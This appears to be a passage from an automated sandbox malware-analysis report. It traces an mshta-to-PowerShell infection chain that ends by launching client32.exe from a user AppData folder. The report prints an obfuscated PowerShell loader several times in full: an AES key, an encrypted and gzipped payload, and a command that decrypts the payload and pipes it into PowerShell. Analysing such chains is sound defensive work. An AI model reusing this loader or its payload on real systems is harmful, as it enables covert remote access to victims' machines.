'rvjyq3fgsfzxtuvhcnp3s2zycfp2vhh0rxfudmjywhu=';$hyoynbe = new-object 'system.security.cryptography.aesmanaged';$hyoynbe.mode = [system.security.cryptography.ciphermode]::ecb;$hyoynbe.padding = [system.security.cryptography.paddingmode]::zeros;$hyoynbe.blocksize = 128;$hyoynbe.keysize = 256;$hyoynbe.key = [system.convert]::frombase64string($osjngw);$mojfo = [system.convert]::frombase64string($cwwl);$qfsoizvu = $mojfo[0..15];$hyoynbe.iv = $qfsoizvu;$vcdtgjdlo = $hyoynbe.createdecryptor();$kqwgqywut = $vcdtgjdlo.transformfinalblock($mojfo, 16, $mojfo.length - 16);$hyoynbe.dispose();$enauwbr = new-object system.io.memorystream( , $kqwgqywut );$sqftam = new-object system.io.memorystream;$shlbzafix = new-object system.io.compression.gzipstream $enauwbr, ([io.compression.compressionmode]::decompress);$shlbzafix.copyto( $sqftam );$shlbzafix.close();$enauwbr.close();[byte[]] $dnznxe = $sqftam.toarray();$xzhvto = [system.text.encoding]::utf8.getstring($dnznxe);$xzhvto | powershell - Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $cwwl = 'aaaaaaaaaaaaaaaaaaaaacgw0ktxfdt7vygqwkvuwzworwwq3for84lkr0hidbn55hu2p/qah7ukiclpja/xsje84njjo6jid61fi3om68eocgqv7+xcdpabw0jxs0bnlsjcdsqlwtliz1e8r3s8ajj1pumqy7ww9ut2vonu9+010dg1zxzzgrna/hcsuz5yvlblgbkews5uqz7ksxbyb+ciclftcoklkzz7/mgcao3wn7zez9gb0u7sliy7/xgnqsb0l3y8s69rujddmpyrh/rzgp2gf/qgjhb69/jjuk79sbgoiim5ovsj9cpwdthdrf2p9xkkgkxcbzjk9sv8cquolvmo0s3whoiyqmsy+pqxj4e/1jontj7rpinv74j3axt+r8la7t/hmwunuxugjbbnyl3fdw8s+g5jnu2lt2qbmjnycxdzehhs37qr0lcaxlnh7pqhbdgnyumxna6gjlxd0f87ey0fnf6zb/er50wxpe/dxv/2vom4h7eonay3pyelb6cfgk5v+vcmzz1g3fhk+od59x4tiq/jsbjrv1tbgak4pwwukiat07qtb8nb6lwm7kzwo7hjpzygy+dvue1b5poeflx54pwq3fedtfctsptbrylkdvk0nxyfp/g/pv523vbkf67xcbp4jyyn0trkraorzouhersuwwhhbgshkwmxic+l1pjdcozyeefszmwlbm2jfbwg0ymokbzg4tcb0wxvmt2cmatl9cem3kfsu75jxtnn4spkmmxgpemj2ldy7zr1o9hp6kbkk+bji3gfmb9ry8y1xwivburw2uyypecbxn38x9tvobsojubzqse9wj2tyhbrmhmbrlqu/tovc/zqfuwqwaj35wkekei0pa4ioehdhfzuxes8dje0qsoj3xncxb/cqtf5hweilopuxhlrhfevyvbv0bydrlzqzgbt9wnyyl/ulpyqa5jnbublmlaceqgfqqpn9jaeiild/wra2pz15h459lgu0en5qvzpnftlza+wkpfbxvyyxlcop8wapuaztyj70nhyqkevtwo9/5jraew4vqzchog2aaorryecnioyj+vnqvardafr/6jojiugdfpzql8agehmghjttikhbattw3jxm42zxyle11kzt5pk56yj3z/5o6urs7i1tdnr5oycuy5kmyjfu4f53fc65md/65hgrrktgdjwauckrazvmplhsromk4x6nkqcn/lspzrvhtbwxfpvfq8ksxap1wfuqdn8gz0z4sbapyzdzptss35qdlmo7wjjpr5h/lrd0em7gmqwijrcpuf5onwzehfam9maflouaynybcjeor/t4xmdsihkezxjsr6x6wrkze3ph08iwnejlkithujabgexmkq8xztqjnpi3oecxcdmsjl9hr3dnsx8d2uijz15eyelg8esgn9njz3gnn6i6aoa8nxikvlotj5fw1lq6si93ovumtwnrqlo++5wkqe7pyfdzxcbf7x5vigs0+mvugezqsejinvtyjx6gcekw6bnjq0n5pzu62zo37pxleodb7pm4qj+5gti1gmy0n94xqmvltwhene=';$osjngw = 'rvjyq3fgsfzxtuvhcnp3s2zycfp2vhh0rxfudmjywhu=';$hyoynbe = new-object 'system.security.cryptography.aesmanaged';$hyoynbe.mode = [system.security.cryptography.ciphermode]::ecb;$hyoynbe.padding = [system.security.cryptography.paddingmode]::zeros;$hyoynbe.blocksize = 128;$hyoynbe.keysize = 256;$hyoynbe.key = [system.convert]::frombase64string($osjngw);$mojfo = [system.convert]::frombase64string($cwwl);$qfsoizvu = $mojfo[0..15];$hyoynbe.iv = $qfsoizvu;$vcdtgjdlo = $hyoynbe.createdecryptor();$kqwgqywut = $vcdtgjdlo.transformfinalblock($mojfo, 16, $mojfo.length - 16);$hyoynbe.dispose();$enauwbr = new-object system.io.memorystream( , $kqwgqywut );$sqftam = new-object system.io.memorystream;$shlbzafix = new-object system.io.compression.gzipstream $enauwbr, ([io.compression.compressionmode]::decompress);$shlbzafix.copyto( $sqftam );$shlbzafix.close();$enauwbr.close();[byte[]] $dnznxe = $sqftam.toarray();$xzhvto = [system.text.encoding]::utf8.getstring($dnznxe);$xzhvto Jump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - }Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell - Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MediaContent\client32.exe "C:\Users\user\AppData\Roaming\MediaContent\client32.exe" Jump to behavior
                                Source: client32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: client32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: Progman
                                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
